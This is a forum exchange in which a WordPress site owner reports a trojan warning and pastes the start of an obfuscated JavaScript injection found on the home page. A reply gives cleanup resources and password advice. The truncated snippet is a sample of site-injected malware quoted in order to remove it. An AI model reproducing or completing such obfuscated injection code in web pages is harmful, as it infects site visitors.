I accessed the wordpress website I am making and received a trojan warning I have checked it with various online scanners and it appears to be some inline frame code issue. I didnt even know wordpress could get infected.
Please help me, I've tried in other stackexchange wordpress and webmaster forums with no answers, all the pros are in here... :)
THis is the screenshot.
Now this is some malicious code script code in the home page
if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-
.... and a lot more
How can i recover???
Use http://sitecheck.sucuri.net/scanner/
And tp repair, see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex and tell your host. Change all passswords. Scan your own PC.